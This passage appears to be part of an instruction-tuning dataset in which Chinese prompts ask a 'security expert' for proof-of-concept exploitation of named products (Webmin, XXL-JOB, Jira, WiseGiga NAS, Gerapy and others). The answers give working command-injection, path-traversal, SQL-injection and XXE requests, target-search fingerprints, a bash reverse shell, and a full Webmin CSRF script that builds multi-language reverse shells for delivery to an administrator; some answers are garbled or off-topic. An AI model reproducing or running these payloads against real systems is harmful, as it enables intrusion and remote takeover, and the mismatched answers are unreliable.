60\n\nuser=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2\n3. Host: your-ip:10000\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Webmin 远程命令执行漏洞 CVE-2019-15107.md"}
    787. 

  787. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WiseGiga NAS group.php 远程命令执行漏洞\n漏洞描述:WiseGiga 是一家销售网络连接存储(NAS )产品的韩国公司。 WiseGiga NAS group.php文件存在远程命令执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限\n影响版本:``` WiseGiga NAS ```\n网络测绘:``` app=\"WISEGIGA-NAS\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. WiseGiga NAS\n2. app=\"WISEGIGA-NAS\"\n3. /admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/WiseGiga NAS group.php 远程命令执行漏洞.md"}
    788. 

  788. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:KubePi LoginLogsSearch 未授权访问漏洞 CVE-2023-22478\n漏洞描述:KubePi 是一个现代化的 K8s 面板。KubePi 允许管理员导入多个 Kubernetes 集群,并且通过权限控制,将不同 cluster、namespace 的权限分配给指定用户。它允许开发人员管理 Kubernetes 集群中运行的应用程序并对其进行故障排查,供开发人员更好地处理 Kubernetes 集群中的复杂性。 KubePi LoginLogsSearch 方法下的接口存在未授权访问漏洞,攻击者通过漏洞可以未授权获取用户的登录日志信息,进一步爆破用户。\n影响版本:``` KubePi <= v1.6.4 ```\n网络测绘:``` \"kubepi\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-22478\n【POC利用方法】\n1. KubePi <= v1.6.4\n2. POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nContent-Type: application/json\n\n{}\n3. POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/KubePi LoginLogsSearch 未授权访问漏洞 CVE-2023-22478.md"}
    789. 

  789. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:XXL-JOB 任务调度中心 后台任意命令执行漏洞\n漏洞描述:XXL-JOB 任务调度中心攻击者可以在后台可以通过写入shell命令任务调度获取服务器权限\n影响版本:``` XXL-JOB ```\n网络测绘:``` app=\"XXL-JOB\" || title=\"任务调度中心\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"XXL-JOB\" || title=\"任务调度中心\"\n2. #!/bin/bash\nbash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1'\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/XXL-JOB 任务调度中心 后台任意命令执行漏洞.md"}
    790. 

  790. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914\n漏洞描述:GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口,你可以用它来建立数据库全面管理IT的电脑,显示器,服务器,打印机,网络设备,电话,甚至硒鼓和墨盒等。GLPI 10.0.2及之前版本存在安全漏洞,该漏洞源于htmlawed 模块中的 `/vendor/htmlawed/htmlawed/htmLawedTest.php` 允许 PHP 代码注入。\n影响版本:``` GLPI 10.0.2及之前版本 ```\n网络测绘:``` title=\"GLPI\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-35914\n【POC利用方法】\n1. GLPI 10.0.2及之前版本\n2. title=\"GLPI\"\n3. https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914.md"}
    791. 

  791. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:绿盟 SAS堡垒机 GetFile 任意文件读取漏洞\n漏洞描述:绿盟堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录\n影响版本:绿盟 SAS堡垒机\n网络测绘:``` body=\"'/needUsbkey.php?username='\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"'/needUsbkey.php?username='\"\n2. /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd\n3. /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/绿盟 SAS堡垒机 GetFile 任意文件读取漏洞.md"}
    792. 

  792. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Jira com.atlassian.jira 敏感信息泄漏 CVE-2019-8442\n漏洞描述:Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。 远程攻击者可利用该漏洞访问Jira webroot中的文件。\n影响版本:``` Atlassian Jira < 7.13.4 Atlassian Jira 8.00-8.0.4 Atlassian Jira 8.1.0-8.1.1 ```\n网络测绘:``` app=\"ATLASSIAN-JIRA\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-8442\n【POC利用方法】\n1. Atlassian Jira < 7.13.4\nAtlassian Jira 8.00-8.0.4\nAtlassian Jira 8.1.0-8.1.1\n2. app=\"ATLASSIAN-JIRA\"\n3. /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Jira com.atlassian.jira 敏感信息泄漏 CVE-2019-8442.md"}
    793. 

  793. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 NGAF下一代防火墙 loadfile.php 任意文件读取漏洞\n漏洞描述:深信服下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。深信服下一代防火墙在 loadfile.php 处存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等。\n影响版本:深信服 NGAF下一代防火墙\n网络测绘:``` \"Redirect.php?url=LogInOut.php\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"Redirect.php?url=LogInOut.php\"\n2. GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1\nHost: \nUser-Agent: Opera/8.90.(Windows NT 6.0; is-IS) Presto/2.9.177 Version/10.00\nAccept-Encoding: gzip, deflate\nAccept: */*\ny-forwarded-for: 127.0.0.1\n3. GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 NGAF下一代防火墙 loadfile.php 任意文件读取漏洞.md"}
    794. 

  794. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WSO2 fileupload 任意文件上传漏洞 CVE-2022-29464\n漏洞描述:CVE-2022-29464 是 Orange Tsai发现的 WSO2 上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意 JSP 文件在 WSO2 服务器上获得 RCE。\n影响版本:``` WSO2 API Manager 2.2.0 and above WSO2 Identity Server 5.2.0 and above WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, 5.6.0 WSO2 Identity Server as Key Manager 5.3.0 and above WSO2 Enterprise Integrator 6.2.0 and above ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-29464\n【POC利用方法】\n1. WSO2 API Manager 2.2.0 and above\nWSO2 Identity Server 5.2.0 and above\nWSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, 5.6.0\nWSO2 Identity Server as Key Manager 5.3.0 and above\nWSO2 Enterprise Integrator 6.2.0 and above\n2. protected void doPost(HttpServletRequest request,\n                          HttpServletResponse response) throws ServletException, IOException {\n\n        try {\n            fileUploadExecutorManager.execute(request, response);\n        } catch (Exception e) {\n            String msg = \"File upload failed \";\n            log.error(msg, e);\n            throw new ServletException(e);\n        }\n    }\n3. execute:55, ToolsAnyFileUploadExecutor (org.wso2.carbon.ui.transports.fileupload)\nexecuteGeneric:104, AbstractFileUploadExecutor (org.wso2.carbon.ui.transports.fileupload)\nexecute:436, FileUploadExecutorManager$CarbonXmlFileUploadExecHandler (org.wso2.carbon.ui.transports.fileupload)\nstartExec:320, FileUploadExecutorManager$FileUploadExecutionHandlerManager (org.wso2.carbon.ui.transports.fileupload)\nexecute:127, FileUploadExecutorManager (org.wso2.carbon.ui.transports.fileupload)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/WSO2 fileupload 任意文件上传漏洞 CVE-2022-29464.md"}
    795. 

  795. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:IceWarp WebClient basic 远程命令执行漏洞\n漏洞描述:IceWarp WebClient 存在远程命令执行漏洞,攻击者构造特殊的请求即可远程命令执行\n影响版本:``` IceWarp WebClient ```\n网络测绘:``` app=\"IceWarp-公司产品\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. IceWarp WebClient\n2. app=\"IceWarp-公司产品\"\n3. POST /webmail/basic/ HTTP/1.1\nHost: sd.sahadharawat.com\nContent-Type: application/x-www-form-urlencoded\nCookie: use_cookies=1\nContent-Length: 43\n\n_dlg[captcha][target]=system(\\'ipconfig\\')\\\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/IceWarp WebClient basic 远程命令执行漏洞.md"}
    796. 

  796. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:宝塔 phpmyadmin未授权访问漏洞\n漏洞描述:【宝塔面板】紧急安全更新通知,Linux面板7.4.2版本/Windows面板6.8版本存在安全隐患,其他版本无此风险。已发布紧急更新,请所有使用此版本的用户务必升级到最新版,更新方法,登录面板直接升级更新即可,如更新出现问题,请登录宝塔论坛反馈或者联系客服反馈\n影响版本:``` Linux正式版7.4.2 Linux测试版7.5.13 Windows正式版6.8 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Linux正式版7.4.2\nLinux测试版7.5.13\nWindows正式版6.8\n2. 访问 [**http://xxx.xxx.xxx.xxx:888/pma**](http://xxx.xxx.xxx.xxx:888/pma) 即可\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/宝塔 phpmyadmin未授权访问漏洞.md"}
    797. 

  797. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Riskscanner list SQL注入漏洞\n漏洞描述:Riskscanner list接口存在SQL注入漏洞,通过漏洞可获取服务器权限\n影响版本:``` Riskscanner ```\n网络测绘:``` title=\"Riskscanner\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Riskscanner\n2. title=\"Riskscanner\"\n3. POST /resource/list/1/10 HTTP/1.1\nHost: \nContent-Length: 41\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36\nContent-Type: application/json;charset=UTF-8\n\n{\"sort\":\"1)a union select sleep(5) -- -\"}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Riskscanner list SQL注入漏洞.md"}
    798. 

  798. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 DC数据中心管理系统 sangforindex XML实体注入漏洞\n漏洞描述:深信服 DC数据中心管理系统 sangforindex 接口存在XML实体注入漏洞,攻击者可以发送特定的请求包造成XML实体注入\n影响版本:深信服 DC数据中心管理系统\n网络测绘:``` \"SANGFOR 数据中心\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"SANGFOR 数据中心\"\n2. POST /src/sangforindex HTTP/1.1\nHost: \nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<!DOCTYPE root [\n    <!ENTITY rootas SYSTEM \"http://xgsg1k.dnslog.cn\">\n]>\n<xxx>\n&rootas;\n</xxx>\n3. POST /src/sangforindex HTTP/1.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 DC数据中心管理系统 sangforindex XML实体注入漏洞.md"}
    799. 

  799. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Jira 敏感信息泄露 CVE-2021-26086\n漏洞描述:JIRA是Atlassian公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 参考链接: - https://jira.atlassian.com/browse/JRASERVER-72695\n影响版本:``` version < 8.5.14 8.6.0 ≤ version < 8.13.6 8.14.0 ≤ version < 8.16.1 ```\n网络测绘:``` app=\"ATLASSIAN-JIRA\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-26086\n【POC利用方法】\n1. version < 8.5.14\n8.6.0 ≤ version < 8.13.6\n8.14.0 ≤ version < 8.16.1\n2. app=\"ATLASSIAN-JIRA\"\n3. /s/cfx/_/;/WEB-INF/web.xml\n/s/cfx/_/;/WEB-INF/decorators.xml\n/s/cfx/_/;/WEB-INF/classes/seraph-config.xml\n/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\n/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml\n/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Jira 敏感信息泄露 CVE-2021-26086.md"}
    800. 

  800. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Jira ViewUserHover.jspa 用户信息泄露漏洞 CVE-2020-14181\n漏洞描述:Jira存在一个未授权访问漏洞,未授权的用户可以通过一个api接口直接查询到某用户名的存在情况,该接口不同于CVE-2019-8446和CVE-2019-3403的接口,是一个新的接口。如果Jira暴露在公网中,未授权用户就可以直接访问该接口爆破出潜在的用户名。\n影响版本:``` Atlassian Jira < 7.13.6 Atlassian Jira 8.0.0 - 8.5.7 Atlassian Jira 8.6.0 - 8.12.0 ```\n网络测绘:``` app=\"Jira\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-14181\n【POC利用方法】\n1. Atlassian Jira < 7.13.6\nAtlassian Jira 8.0.0 - 8.5.7\nAtlassian Jira 8.6.0 - 8.12.0\n2. /secure/ViewUserHover.jspa?username=admin\n3. import requests\nimport sys\nimport random\nimport re\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mGithub : https://github.com/PeiQi0                                 \\033[0m')\n    print('+  \\033[34mVersion: Atlassian Jira < 7.13.6                                   \\033[0m')\n    print('+  \\033[34mVersion: Atlassian Jira 8.0.0 - 8.5.7                              \\033[0m')\n    print('+  \\033[34mVersion: Atlassian Jira 8.6.0 - 8.12.0                             \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url):\n    vuln_url = target_url + \"/secure/ViewUserHover.jspa?username=peiqipeiqipeiqi\"\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n    }\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)\n        version = re.findall(r'<span id=\"footer-build-information\">\\((.*?)#', response.text)[0]\n        print(\"\\033[32m[o] 目标 Jira 版本为{} \\033[0m\".format(version))\n        if \"peiqipeiqipeiqi\" in response.text:\n            print(\"\\033[32m[o] 目标{}存在漏洞 \\033[0m\".format(target_url))\n        else:\n            print(\"\\033[31m[x] 目标不存在漏洞 \\033[0m\")\n            sys.exit(0)\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Jira ViewUserHover.jspa 用户信息泄露漏洞 CVE-2020-14181.md"}
    801. 

  801. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Webmin 多个高危漏洞 CVE-2021-31760~62\n漏洞描述:CVE-2021-31760:利用CSRF攻击,实现对Webmin的远程命令执行。 CVE-2021-31761:利用XSS攻击,实现对Webmin的远程命令执行。 CVE-2021-31762:利用CSRF攻击,通过Webmin的添加用户功能创建特权用户,然后通过特权用户权限反弹shell。 参考链接: - CVE-2021-31760:https://github.com/electronicbots/CVE-2021-31760 - CVE-2021-31761:https://github.com/electronicbots/CVE-2021-31761 - CVE-2021-31762:https://github.com/electronicbots/CVE-2021-31762\n影响版本:``` Webmin <= 1.973 ```\n网络测绘:``` app=\"Webmin\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-31760\n【POC利用方法】\n1. Webmin <= 1.973\n2. app=\"Webmin\"\n3. import time, subprocess,random\n\nprint('''\\033[1;37m\n\n __  __           _     ____  _          _________  _     _            _    \n|  \\/  |         | |   |___ \\| |        |___  / _ \\| |   | |          | |   \n| \\  / | ___  ___| |__   __) | |           / / | | | | __| |_   _  ___| | __\n| |\\/| |/ _ \\/ __| '_ \\ |__ <| |          / /| | | | |/ _` | | | |/ __| |/ /\n| |  | |  __/\\__ \\ | | |___) | |  _ _    / /_| |_| | | (_| | |_| | (__|   < \n|_|  |_|\\___||___/_| |_|____/|_| (_|_)  /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/\n                                                             __/ |          \n                                                            |___/           \n\n    \\033[1;m''')\n\nfor i in range(101):\n    print(\n        \"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;37m@Mesh3l_911\\033[1;m\\033[1;36m )  & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m  ( \\033[1;m\\033[1;37m@electronicbots\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format(\n            i), \"\\033[1;36m%\\033[1;m\", end=\"\")\n    time.sleep(0.02)\nprint(\"\\n\\n\")\n\ntarget = input(\n    \"\\033[1;36m \\n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\")\n\nif target.endswith('/'):\n    target = target + 'proc/run.cgi'\nelse:\n    target = target + '/proc/run.cgi'\n\nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\")\n\nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\")\n\nReverseShell = input \\\n('''\\033[1;37m\n\\n\n1- Bash Reverse Shell \\n\n2- PHP Reverse Shell \\n\n3- Python Reverse Shell \\n\n4- Perl Reverse Shell \\n\n5- Ruby Reverse Shell \\n\n\\033[1;m\n\n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \\033[1;m''')\n\nfile_name = random.randrange(1000)\n\nif ReverseShell == '1':\n    ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''\n\nelif ReverseShell == '2':\n    ReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' '''\n\nelif ReverseShell == '3':\n    ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' '''\n\nelif ReverseShell == '4':\n    ReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' '''\n\nelif ReverseShell == '5':\n    ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' '''\n\nelse:\n    print(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\")\n\n\ndef CSRF_Generator():\n    with open('CSRF_POC.html', 'w') as POC:\n        POC.write \\\n            ('''\n\n<html>\n        <head>\n            <meta name=\"referrer\" content=\"never\">\n        </head>\n  <body>\n    <script>history.pushState('', '', '/')</script>\n    <form action=\"''' + target +'''\" method=\"POST\">\n      <input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" />\n      <input type=\"hidden\" name=\"mode\" value=\"0\" />\n      <input type=\"hidden\" name=\"user\" value=\"root\" />\n      <input type=\"hidden\" name=\"input\" value=\"\" />\n      <input type=\"hidden\" name=\"undefined\" value=\"\" />\n      <input type=\"submit\" value=\"Submit request\" />\n    </form>\n    <script>\n      document.forms[0].submit();\n    </script>\n  </body>\n\n</html>\n\n    ''')\n    POC.close()\n\n    print(\n        \"\\033[1;36m\\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \\n \\033[1;m\")\n\n\ndef Netcat_listener():\n    print()\n    subprocess.run([\"nc\", \"-nlvp \"+port+\"\"])\n\n\ndef main():\n    CSRF_Generator()\n    Netcat_listener()\n\n\nif __name__ == '__main__':\n    main()\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md"}
    802. 

  802. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:绿盟 SAS堡垒机 Exec 远程命令执行漏洞\n漏洞描述:绿盟 SAS堡垒机 Exec 远程命令执行漏洞\n影响版本:绿盟 SAS堡垒机\n网络测绘:``` body=\"'/needUsbkey.php?username='\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"'/needUsbkey.php?username='\"\n2. <?php\n  require_once 'Nsc/Websvc/Response.php';\nclass ExecController extends Cavy_Controller_Action {\n\n  var $models = 'no';\n\n  public function index() {\n    $command = $this->_params['cmd'];\n    $ret = 0;\n    $output = array();\n    exec($command,$output,$ret);\n    $result = new StdClass;\n    if ($ret != 0) {\n      $result->code = Nsc_Websvc_Response::EXEC_ERROR;\n      $result->text = \"exec error\";\n    }\n    else {\n      $result->code = Nsc_Websvc_Response::SUCCESS;\n      //\t\t\t$result->text = implode(\"\\n\",$output);\n      $result->text = \"WEBSVC OK\";\n    }\n    $this->_render(array('result'=>$result),'/websvc/result');\n  }\n}\n?>\n3. /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/绿盟 SAS堡垒机 Exec 远程命令执行漏洞.md"}
    803. 

  803. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:齐治堡垒机 gui_detail_view.php 任意用户登录漏洞\n漏洞描述:齐治堡垒机 存在任意用户登录漏洞,访问特定的Url即可获得后台权限\n影响版本:``` 齐治堡垒机 ```\n网络测绘:``` app=\"齐治科技-堡垒机\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"齐治科技-堡垒机\"\n2. http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm\n3. http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/齐治堡垒机 gui_detail_view.php 任意用户登录漏洞.md"}
    804. 

  804. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:FFmpeg 任意文件读取漏洞/SSRF漏洞 CVE-2016-1897/CVE-2016-1898\n漏洞描述:FFmpeg 是一套可以用来记录、转换数字音频、视频,并能将其转化为流的开源计算机程序。功能非常强大,是每个视频网站必不可少的多媒体文件处理程序。 在 FFMpeg2.X 由于在解析 HTTP Live Streaming 流媒体 m3u8 文件处理不当,可导致 SSRF 漏洞与任意文件读取漏洞。当网站允许用户上传多媒体文件,并使用 FFMpeg 进行处理时会触发该漏洞。 这个漏洞有两个 CVE 编号,分别是 CVE-2016-1897 和 CVE-2016-1898,它们两个的区别在于读取文件的行数,CVE-2016-1897 只能读取文件的第一行。 - [http://blog.neargle.com/SecNewsBak/drops/CVE-2016-1897.8%20-%20FFMpeg%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html](http://blog.neargle.com/SecNewsBak/drops/CVE-2016-1897.8 - FFMpeg漏洞分析.html) - http://habrahabr.ru/company/mailru/blog/274855/ 目前该漏洞已在FFMpeg **2.8.5**中修复。\n影响版本:``` FFmpeg 2.8.x < 2.8.5 FFmpeg 2.7.x < 2.7.5 FFmpeg 2.6.x < 2.6.7 FFmpeg 2.5.x < 2.5.10 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2016-1897\n【POC利用方法】\n1. FFmpeg 2.8.x < 2.8.5\nFFmpeg 2.7.x < 2.7.5\nFFmpeg 2.6.x < 2.6.7\nFFmpeg 2.5.x < 2.5.10\n2. http://pl.youku.com/playlist/m3u8?vid=340270152&type=3gphd&ts=1462714824&keyframe=0&ep=dSaSGE6MUssC5ybeiz8bYiXiIiZdXP0O9h2CgdNnAtQnS%2Bm2&sid=746271452251312590fab&token=3319&ctype=12&ev=1&oip=3395898128\n3. #EXTM3U\n#EXT-X-TARGETDURATION:6\n#EXT-X-VERSION:2\n#EXTINF:6,\nhttp://183.60.145.83/69777D60D183E7FE8D0BC25A4/030002010056208D059E4E15049976CD642E01-C8E5-706F-DC6D-375DE0DA5A1E.flv.ts?ts_start=0&ts_end=5.9&ts_seg_no=0&ts_keyframe=1\n#EXTINF:0,\nhttp://183.60.145.83/69777D60D183E7FE8D0BC25A4/030002010056208D059E4E15049976CD642E01-C8E5-706F-DC6D-375DE0DA5A1E.flv.ts?ts_start=5.9&ts_end=6.367&ts_seg_no=1&ts_keyframe=1\n#EXT-X-ENDLIST\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/FFmpeg 任意文件读取漏洞SSRF漏洞 CVE-2016-1897+CVE-2016-1898.md"}
    805. 

  805. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Gerapy parse 后台远程命令执行漏洞\n漏洞描述:Gerapy gerapy/server/core/views.py 中的方法存在任意命令执行,攻击者登录后台后发送特定的请求包即可利用漏洞\n影响版本:``` Gerapy <= 0.9.7 ```\n网络测绘:``` title=\"Gerapy\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Gerapy <= 0.9.7\n2. title=\"Gerapy\"\n3. POST /api/project/1/parse HTTP/1.1\nHost: \nPragma: no-cache\nCache-Control: no-cache\nAccept: application/json, text/plain, */*\nAuthorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nContent-Length: 18\n\n{\"spider\":\";`id`\"}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Gerapy parse 后台远程命令执行漏洞.md"}
    806. 

